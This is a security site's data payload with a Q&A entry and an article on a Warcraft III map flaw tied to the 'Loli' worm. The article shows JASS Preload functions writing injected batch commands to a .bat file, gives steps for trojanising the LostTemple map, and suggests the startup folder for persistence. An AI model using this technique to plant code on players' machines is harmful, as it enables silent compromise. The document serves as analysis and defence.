[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fM36ioL7zpren5DAlhN2nO0pms6pFJY5exLLW185Rwzg":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},371,"What are the special JASS functions that enable this file writing vulnerability, and how do they work?","The three key functions are `PreloadGenClear()`, `PreloadGenStart()`, and `PreloadGenEnd(string filename)`. `PreloadGenClear()` resets the log, `PreloadGenStart()` begins recording all `Preload()` calls, and `PreloadGenEnd()` writes the recorded content to the specified file. By calling `Preload()` with strings containing newline characters (`\\n`) and setting the filename to a `.bat` path, an attacker can inject arbitrary batch commands. This is similar to how log injection works in other vulnerabilities like [Analysis of CVE-2017-8360 (Keylogger in HP Audio Driver) Exploitation](\u002Fnews\u002Fanalysis-of-cve-2017-8360-keylogger-in-hp-audio-driver-exploitation).","\u003Cp>The three key functions are `PreloadGenClear()`, `PreloadGenStart()`, and `PreloadGenEnd(string filename)`. `PreloadGenClear()` resets the log, `PreloadGenStart()` begins recording all `Preload()` calls, and `PreloadGenEnd()` writes the recorded content to the specified file. By calling `Preload()` with strings containing newline characters (`\\n`) and setting the filename to a `.bat` path, an attacker can inject arbitrary batch commands. This is similar to how log injection works in other vulnerabilities like [Analysis of CVE-2017-8360 (Keylogger in HP Audio Driver) Exploitation](\u002Fnews\u002Fanalysis-of-cve-2017-8360-keylogger-in-hp-audio-driver-exploitation).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fanalysis-introduction-of-war3-map-vulnerability\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-special-jass-functions-that-enable-this-file-writing-vulnerability--1777484032164","PreloadGenClear, PreloadGenStart, PreloadGenEnd, JASS, file writing, bat",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},93,"Analysis Introduction of War3 Map \"Vulnerability\"","analysis-introduction-of-war3-map-vulnerability","Technical analysis of War3 map vulnerability via JASS scripting, exploit steps, and defense methods. Learn how modified maps execute malicious code.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, the Tencent Computer Manager team analyzed the \"Loli\" worm that spreads by exploiting vulnerabilities in \"Warcraft III\", introducing the operational process of the \"Loli\" worm. Subsequently, the author of this \"worm\" clarified the matter on their website. Without delving into the gossip surrounding this event, we will focus solely on the technical aspects to analyze what this \"Warcraft III\" vulnerability actually is, how it can be exploited, and how to defend against it.\u003C\u002Fp>\u003Cp>\u003Cstrong>\"Loli\" worm analysis link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.freebuf.com\u002Fnews\u002F120136.html\u003C\u002Fp>\u003Cp>\u003Cstrong>Author's blog link of the \"worm\":\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.loxve.com\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The process of this \"Warcraft III\" vulnerability is as follows:\u003C\u002Fp>\u003Cp>1. The attacker uploads a modified Warcraft map and waits for other players to join the room to play.\u003C\u002Fp>\u003Cp>2. After the player enters the room, since the map is not available locally, it will be automatically downloaded.\u003C\u002Fp>\u003Cp>3. After the map is synchronized, the player enters the game, triggering the script in the map, which writes a bat file in the startup directory.\u003C\u002Fp>\u003Cp>4. After the player's computer restarts, the bat file in the startup directory is executed, successfully loading the payload.\u003C\u002Fp>\u003Ch2>0x02 Related Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>JASS\u003C\u002Fh3>\u003Cp>is the scripting language for \"Warcraft III,\" used to control the progression and behavior of maps, serving as the foundation for Warcraft games and maps\u003C\u002Fp>\u003Cp>Units (Unit) placed and triggers (Trigger) set during normal map editing are ultimately translated into JASS language, saved in the map file, and called during game runtime\u003C\u002Fp>\u003Ch3>HkeW3mModifier\u003C\u002Fh3>\u003Cp>is a tool for modifying MPQ format files, capable of editing encrypted MPQ files, featuring powerful resource search functionality to locate most resources in Warcraft maps, rebuild lists, and intelligently extract related textures\u003C\u002Fp>\u003Cp>It can be used to view and edit the file resources contained in maps\u003C\u002Fp>\u003Cp>\u003Cstrong>Operation Instructions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Download HkeW3mModifier.exe, select a map, click \"Analyze Files\" to view the list of files contained in the map, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018757958_0_6d318c2804.jpeg\">\u003C\u002Fp>\u003Cp>Among them, war3map.j contains the logical control code of the map. Right-click to extract war3map.j to view its code, with a portion of the code shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018770503_1_1146ed1028.jpeg\">\u003C\u002Fp>\u003Ch3>File structure in war3map.j\u003C\u002Fh3>\u003Cp>1. Variable Declaration\u003C\u002Fp>\u003Cp>Declared global variables used in the script file\u003C\u002Fp>\u003Cp>Variable declarations in Lost Temple are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002F\u002F***************************************************************************\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F*  Global Variables\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F***************************************************************************\u003Cbr>\u003Cbr>globals\u003Cbr>    \u002F\u002F Generated\u003Cbr>    trigger                 gg_trg_Melee_Initialization = null\u003Cbr>endglobals\u003Cbr>\u003Cbr>function InitGlobals takes nothing returns nothing\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Trigger Section\u003C\u002Fp>\u003Cp>Declared triggers used in the map\u003C\u002Fp>\u003Cp>The trigger section in Lost Temple is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002F\u002F***************************************************************************\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F*  Triggers\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F***************************************************************************\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>\u002F\u002F Trigger: Melee Initialization\u003Cbr>\u002F\u002F\u003Cbr>\u002F\u002F Default melee game initialization for all players\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function Trig_Melee_Initialization_Actions takes nothing returns nothing\u003Cbr>    call MeleeStartingVisibility(  )\u003Cbr>    call MeleeStartingHeroLimit(  )\u003Cbr>    call MeleeGrantHeroItems(  )\u003Cbr>    call MeleeStartingResources(  )\u003Cbr>    call MeleeClearExcessUnits(  )\u003Cbr>    call MeleeStartingUnits(  )\u003Cbr>    call MeleeStartingAI(  )\u003Cbr>    call MeleeInitVictoryDefeat(  )\u003Cbr>endfunction\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function InitTrig_Melee_Initialization takes nothing returns nothing\u003Cbr>    set gg_trg_Melee_Initialization = CreateTrigger(  )\u003Cbr>    call TriggerAddAction( gg_trg_Melee_Initialization, function Trig_Melee_Initialization_Actions )\u003Cbr>endfunction\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function InitCustomTriggers takes nothing returns nothing\u003Cbr>    call InitTrig_Melee_Initialization(  )\u003Cbr>endfunction\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function RunInitializationTriggers takes nothing returns nothing\u003Cbr>    call ConditionalTriggerExecute( gg_trg_Melee_Initialization )\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The meaning can be inferred from the function name\u003C\u002Fp>\u003Cp>function Trig_Melee_Initialization_Actions represents the operations performed by the trigger\u003C\u002Fp>\u003Cp>function InitTrig_Melee_Initialization is used for initialization\u003C\u002Fp>\u003Cp>function InitCustomTriggers registers user-defined triggers\u003C\u002Fp>\u003Cp>The function of RunInitializationTriggers is to run triggers\u003C\u002Fp>\u003Cp>3. Main function main\u003C\u002Fp>\u003Cp>Entry point of the script file\u003C\u002Fp>\u003Cp>The main section in Lost Temple is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002F\u002F***************************************************************************\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F*  Main Initialization\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F***************************************************************************\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function main takes nothing returns nothing\u003Cbr>    call SetCameraBounds( -7936.0 + GetCameraMargin(CAMERA_MARGIN_LEFT), -8192.0 + GetCameraMargin(CAMERA_MARGIN_BOTTOM), 7936.0 - GetCameraMargin(CAMERA_MARGIN_RIGHT), 7680.0 - GetCameraMargin(CAMERA_MARGIN_TOP), -7936.0 + GetCameraMargin(CAMERA_MARGIN_LEFT), 7680.0 - GetCameraMargin(CAMERA_MARGIN_TOP), 7936.0 - GetCameraMargin(CAMERA_MARGIN_RIGHT), -8192.0 + GetCameraMargin(CAMERA_MARGIN_BOTTOM) )\u003Cbr>    call SetDayNightModels( \"Environment\\\\DNC\\\\DNCLordaeron\\\\DNCLordaeronTerrain\\\\DNCLordaeronTerrain.mdl\", \"Environment\\\\DNC\\\\DNCLordaeron\\\\DNCLordaeronUnit\\\\DNCLordaeronUnit.mdl\" )\u003Cbr>    call NewSoundEnvironment( \"Default\" )\u003Cbr>    call SetAmbientDaySound( \"LordaeronSummerDay\" )\u003Cbr>    call SetAmbientNightSound( \"LordaeronSummerNight\" )\u003Cbr>    call SetMapMusic( \"Music\", true, 0 )\u003Cbr>    call CreateAllUnits(  )\u003Cbr>    call InitBlizzard(  )\u003Cbr>    call InitGlobals(  )\u003Cbr>    call InitCustomTriggers(  )\u003Cbr>    call RunInitializationTriggers(  )\u003Cbr>\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>4. Other Settings\u003C\u002Fp>\u003Cp>Such as Unit Item Tables, Unit Creation, Players, Map Configuration are omitted for now\u003C\u002Fp>\u003Ch2>0x03 Jass Preload File Vulnerability\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fbbs.islga.org\u002Fforum.php?mod=viewthread&amp;tid=48422&amp;extra=page%3D1&amp;page=1\u003C\u002Fp>\u003Cp>Three special functions in JASS:\u003C\u002Fp>\u003Cul>\u003Cli>native PreloadGenClear  takes nothing returns nothing\u003C\u002Fli>\u003Cli>native PreloadGenStart  takes nothing returns nothing\u003C\u002Fli>\u003Cli>native PreloadGenEnd    takes string filename returns nothing\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The above three functions are used to record all Preload() statements executed between PreloadGenStart() and PreloadGenEnd(), and write them into the pld file specified by the PreloadGenEnd() function\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Similar to outputting a log file\u003C\u002Fp>\u003Cp>\u003Cstrong>Example:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The JASS code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Test takes nothing returns nothing\u003Cbr>    call PreloadGenClear()\u003Cbr>    call PreloadGenStart()\u003Cbr>    call Preload( \"ReplaceableTextures \\\\CameraMasks\\\\White_mask.blp\" )\u003Cbr>    call PreloadGenEnd(\"c:\\\\test\\\\test.pld\")\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After executing the function Test(), a new file test.pld will be created under c:\\test\\, with the following content written:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Test takes nothing returns nothing\u003Cbr>    call Preload( \"ReplaceableTextures \\\\CameraMasks\\\\White_mask.blp\" )\u003Cbr>    call PreloadEnd( 0.0 )\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Vulnerability Principle\u003C\u002Fh3>\u003Ch3>1. Setting the output as a .bat file\u003C\u002Fh3>\u003Cp>If the output .pld file extension is changed to .bat, each line in the file is executed as a piece of code (though the statements are invalid and do not conform to batch processing syntax), as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018786593_2_e635d0fb83.jpeg\">\u003C\u002Fp>\u003Ch3>2. Adding line breaks \\n\u003C\u002Fh3>\u003Cp>In batch syntax, \\n represents a line break. Although each line of the .pld file output has a fixed format, by using \\n to break the content in the call Preload() line, it becomes possible to display an executable batch command on a new line.\u003C\u002Fp>\u003Cp>\u003Cstrong>Example:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>JASS code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Test takes nothing returns nothing\u003Cbr>    call PreloadGenClear()\u003Cbr>    call PreloadGenStart()\u003Cbr>    call Preload(\"\\n@echo Test\\n\")\u003Cbr>    call PreloadGenEnd(\"c:\\\\test\\\\test.bat\")\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After outputting to test.bat, it will contain line breaks. The content of the output file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Test takes nothing returns nothing\u003Cbr>    call Preload( \"\u003Cbr>@echo Test\u003Cbr>\" )\u003Cbr>    call PreloadEnd( 0.0 )\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>At this point, a new line of code @echo Test is generated, and @echo Test gets executed, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018799501_3_09c450fea2.jpeg\">\u003C\u002Fp>\u003Ch3>3. Execute batch processing\u003C\u002Fh3>\u003Cp>By default, JASS can only output files but cannot execute them, so files can only be output to the startup items directory and executed after restarting\u003C\u002Fp>\u003Ch2>0x04 Actual Testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Test HelloGA2012.w3m\u003C\u002Fh3>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Attachment from: http:\u002F\u002Fbbs.islga.org\u002Fforum.php?mod=viewthread&amp;tid=48422&amp;extra=page%3D1&amp;page=1\u003C\u002Fp>\u003Cp>War3 version: 1.27.0.52240\u003C\u002Fp>\u003Cp>After loading the map HelloGA2012 and entering the game, press the Esc key. As shown in the figure, a prompt pops up, and the file test.pld is generated under D:\\XX\\\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018807009_4_18f1e53bff.jpeg\">\u003C\u002Fp>\u003Cp>Navigate to directory D:\\XX\\, locate test.pld with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function PreloadFiles takes nothing returns nothing\u003Cbr>\u003Cbr>  call Preload( \"\u003Cbr>@cls\u003Cbr>@color a\u003Cbr>@echo Hello World\u003Cbr>@echo This is a sample of WC3 map generated BAT file.\u003Cbr>@echo Welcome to http:\u002F\u002Fbbs.islga.org. Let's go 2012 with GA!\u003Cbr>@pause\u003Cbr>@exit\u003Cbr>\" )\u003Cbr>  call PreloadEnd( 0.0 )\u003Cbr>\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test successful\u003C\u002Fp>\u003Ch3>2. Manually modify the official map LostTemple\u003C\u002Fh3>\u003Cp>(1) Obtain source file\u003C\u002Fp>\u003Cp>Open the official map (4)LostTemple.w3m using HkeW3mModifier, export war3map.j\u003C\u002Fp>\u003Cp>(2) Add payload\u003C\u002Fp>\u003Cp>Based on the analysis of the file structure in war3map.j above, add the following code within function Trig_Melee_Initialization_Actions:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>call PreloadGenClear()\u003Cbr>call PreloadGenStart()\u003Cbr>call Preload(\"\\n@echo Test\\n\")\u003Cbr>call PreloadGenEnd(\"c:\\\\test\\\\test.bat\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018813595_5_50e167a2db.jpeg\">\u003C\u002Fp>\u003Cp>(3) Save\u003C\u002Fp>\u003Cp>After saving war3map.j, select replace (add) file in HkeW3mModifier, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018820061_6_e336eb5af1.jpeg\">\u003C\u002Fp>\u003Cp>Select recompress, save the map file, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018825758_7_5dc98a21e9.jpeg\">\u003C\u002Fp>\u003Cp>(4) Testing\u003C\u002Fp>\u003Cp>Place the map in the Maps folder, launch the game, and the map is recognized, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018829861_8_97ba8c5efe.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For testing convenience, the map name has been changed to Test; overwriting the original map provides greater stealth\u003C\u002Fp>\u003Cp>Start the game, a file test.bat is generated under c:\\test\\ with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function PreloadFiles takes nothing returns nothing\u003Cbr>\u003Cbr>  call Preload( \"\u003Cbr>@echo Test\u003Cbr>\" )\u003Cbr>  call PreloadEnd( 0.0 )\u003Cbr>\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If this file is output to the startup directory, it will execute after a reboot\u003C\u002Fp>\u003Cp>Test successful\u003C\u002Fp>\u003Ch2>0x05 Supplement\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. This vulnerability itself does not include code execution functionality, so the key to successful exploitation lies in finding a method to execute code. The most direct approach is to output files to the startup folder. Of course, this vulnerability can also be used to modify specified files.\u003C\u002Fp>\u003Cp>2. In Dota maps, the location of war3map.j is scripts\\war3map.j, which can also be utilized.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Strictly speaking, this Warcraft III vulnerability is not a vulnerability per se, but rather a normal function within Warcraft III maps that supports outputting files. By exploiting this function, carefully crafted code can be output to specific locations and then executed in conjunction with other methods.\u003C\u002Fp>\u003Cp>Therefore, the key to exploiting this vulnerability lies in the execution method, with the common approach being writing to the startup folder.\u003C\u002Fp>\u003Cp>For ordinary users, it is important to pay attention to the startup folder on their own machines. Additionally, antivirus software is already capable of detecting this exploitation method.\u003C\u002Fp>\u003Cp>Stay vigilant and protect yourself to avoid being deceived.\u003C\u002Fp>\u003Cp>Moderate gaming benefits the mind, while excessive gaming harms the body.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, the Tencent Computer Manager team analyzed the \"Loli\" worm that spreads by exploiting vulnerabilities in \"Warcraft III\", introducing the operational process of the \"Loli\" worm. Subsequently, the author of this \"worm\" clarified the matter on their website. Without delving into the gossip surrounding this event, we will focus solely on the technical aspects to analyze what this \"Warcraft III\" vulnerability actually is, how it can be exploited, and how to defend against it.\u003C\u002Fp>\u003Cp>\u003Cstrong>\"Loli\" worm analysis link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.freebuf.com\u002Fnews\u002F120136.html\u003C\u002Fp>\u003Cp>\u003Cstrong>Author's blog link of the \"worm\":\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.loxve.com\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The process of this \"Warcraft III\" vulnerability is as follows:\u003C\u002Fp>\u003Cp>1. The attacker uploads a modified Warcraft map and waits for other players to join the room to play.\u003C\u002Fp>\u003Cp>2. After the player enters the room, since the map is not available locally, it will be automatically downloaded.\u003C\u002Fp>\u003Cp>3. After the map is synchronized, the player enters the game, triggering the script in the map, which writes a bat file in the startup directory.\u003C\u002Fp>\u003Cp>4. After the player's computer restarts, the bat file in the startup directory is executed, successfully loading the payload.\u003C\u002Fp>\u003Ch2>0x02 Related Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>JASS\u003C\u002Fh3>\u003Cp>is the scripting language for \"Warcraft III,\" used to control the progression and behavior of maps, serving as the foundation for Warcraft games and maps\u003C\u002Fp>\u003Cp>Units (Unit) placed and triggers (Trigger) set during normal map editing are ultimately translated into JASS language, saved in the map file, and called during game runtime\u003C\u002Fp>\u003Ch3>HkeW3mModifier\u003C\u002Fh3>\u003Cp>is a tool for modifying MPQ format files, capable of editing encrypted MPQ files, featuring powerful resource search functionality to locate most resources in Warcraft maps, rebuild lists, and intelligently extract related textures\u003C\u002Fp>\u003Cp>It can be used to view and edit the file resources contained in maps\u003C\u002Fp>\u003Cp>\u003Cstrong>Operation Instructions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Download HkeW3mModifier.exe, select a map, click \"Analyze Files\" to view the list of files contained in the map, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018757958_0_6d318c2804-1.jpeg\">\u003C\u002Fp>\u003Cp>Among them, war3map.j contains the logical control code of the map. Right-click to extract war3map.j to view its code, with a portion of the code shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018770503_1_1146ed1028-1.jpeg\">\u003C\u002Fp>\u003Ch3>File structure in war3map.j\u003C\u002Fh3>\u003Cp>1. Variable Declaration\u003C\u002Fp>\u003Cp>Declared global variables used in the script file\u003C\u002Fp>\u003Cp>Variable declarations in Lost Temple are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002F\u002F***************************************************************************\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F*  Global Variables\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F***************************************************************************\u003Cbr>\u003Cbr>globals\u003Cbr>    \u002F\u002F Generated\u003Cbr>    trigger                 gg_trg_Melee_Initialization = null\u003Cbr>endglobals\u003Cbr>\u003Cbr>function InitGlobals takes nothing returns nothing\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Trigger Section\u003C\u002Fp>\u003Cp>Declared triggers used in the map\u003C\u002Fp>\u003Cp>The trigger section in Lost Temple is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002F\u002F***************************************************************************\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F*  Triggers\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F***************************************************************************\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>\u002F\u002F Trigger: Melee Initialization\u003Cbr>\u002F\u002F\u003Cbr>\u002F\u002F Default melee game initialization for all players\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function Trig_Melee_Initialization_Actions takes nothing returns nothing\u003Cbr>    call MeleeStartingVisibility(  )\u003Cbr>    call MeleeStartingHeroLimit(  )\u003Cbr>    call MeleeGrantHeroItems(  )\u003Cbr>    call MeleeStartingResources(  )\u003Cbr>    call MeleeClearExcessUnits(  )\u003Cbr>    call MeleeStartingUnits(  )\u003Cbr>    call MeleeStartingAI(  )\u003Cbr>    call MeleeInitVictoryDefeat(  )\u003Cbr>endfunction\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function InitTrig_Melee_Initialization takes nothing returns nothing\u003Cbr>    set gg_trg_Melee_Initialization = CreateTrigger(  )\u003Cbr>    call TriggerAddAction( gg_trg_Melee_Initialization, function Trig_Melee_Initialization_Actions )\u003Cbr>endfunction\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function InitCustomTriggers takes nothing returns nothing\u003Cbr>    call InitTrig_Melee_Initialization(  )\u003Cbr>endfunction\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function RunInitializationTriggers takes nothing returns nothing\u003Cbr>    call ConditionalTriggerExecute( gg_trg_Melee_Initialization )\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The meaning can be inferred from the function name\u003C\u002Fp>\u003Cp>function Trig_Melee_Initialization_Actions represents the operations performed by the trigger\u003C\u002Fp>\u003Cp>function InitTrig_Melee_Initialization is used for initialization\u003C\u002Fp>\u003Cp>function InitCustomTriggers registers user-defined triggers\u003C\u002Fp>\u003Cp>The function of RunInitializationTriggers is to run triggers\u003C\u002Fp>\u003Cp>3. Main function main\u003C\u002Fp>\u003Cp>Entry point of the script file\u003C\u002Fp>\u003Cp>The main section in Lost Temple is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002F\u002F***************************************************************************\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F*  Main Initialization\u003Cbr>\u002F\u002F*\u003Cbr>\u002F\u002F***************************************************************************\u003Cbr>\u003Cbr>\u002F\u002F===========================================================================\u003Cbr>function main takes nothing returns nothing\u003Cbr>    call SetCameraBounds( -7936.0 + GetCameraMargin(CAMERA_MARGIN_LEFT), -8192.0 + GetCameraMargin(CAMERA_MARGIN_BOTTOM), 7936.0 - GetCameraMargin(CAMERA_MARGIN_RIGHT), 7680.0 - GetCameraMargin(CAMERA_MARGIN_TOP), -7936.0 + GetCameraMargin(CAMERA_MARGIN_LEFT), 7680.0 - GetCameraMargin(CAMERA_MARGIN_TOP), 7936.0 - GetCameraMargin(CAMERA_MARGIN_RIGHT), -8192.0 + GetCameraMargin(CAMERA_MARGIN_BOTTOM) )\u003Cbr>    call SetDayNightModels( \"Environment\\\\DNC\\\\DNCLordaeron\\\\DNCLordaeronTerrain\\\\DNCLordaeronTerrain.mdl\", \"Environment\\\\DNC\\\\DNCLordaeron\\\\DNCLordaeronUnit\\\\DNCLordaeronUnit.mdl\" )\u003Cbr>    call NewSoundEnvironment( \"Default\" )\u003Cbr>    call SetAmbientDaySound( \"LordaeronSummerDay\" )\u003Cbr>    call SetAmbientNightSound( \"LordaeronSummerNight\" )\u003Cbr>    call SetMapMusic( \"Music\", true, 0 )\u003Cbr>    call CreateAllUnits(  )\u003Cbr>    call InitBlizzard(  )\u003Cbr>    call InitGlobals(  )\u003Cbr>    call InitCustomTriggers(  )\u003Cbr>    call RunInitializationTriggers(  )\u003Cbr>\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>4. Other Settings\u003C\u002Fp>\u003Cp>Such as Unit Item Tables, Unit Creation, Players, Map Configuration are omitted for now\u003C\u002Fp>\u003Ch2>0x03 Jass Preload File Vulnerability\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fbbs.islga.org\u002Fforum.php?mod=viewthread&amp;tid=48422&amp;extra=page%3D1&amp;page=1\u003C\u002Fp>\u003Cp>Three special functions in JASS:\u003C\u002Fp>\u003Cul>\u003Cli>native PreloadGenClear  takes nothing returns nothing\u003C\u002Fli>\u003Cli>native PreloadGenStart  takes nothing returns nothing\u003C\u002Fli>\u003Cli>native PreloadGenEnd    takes string filename returns 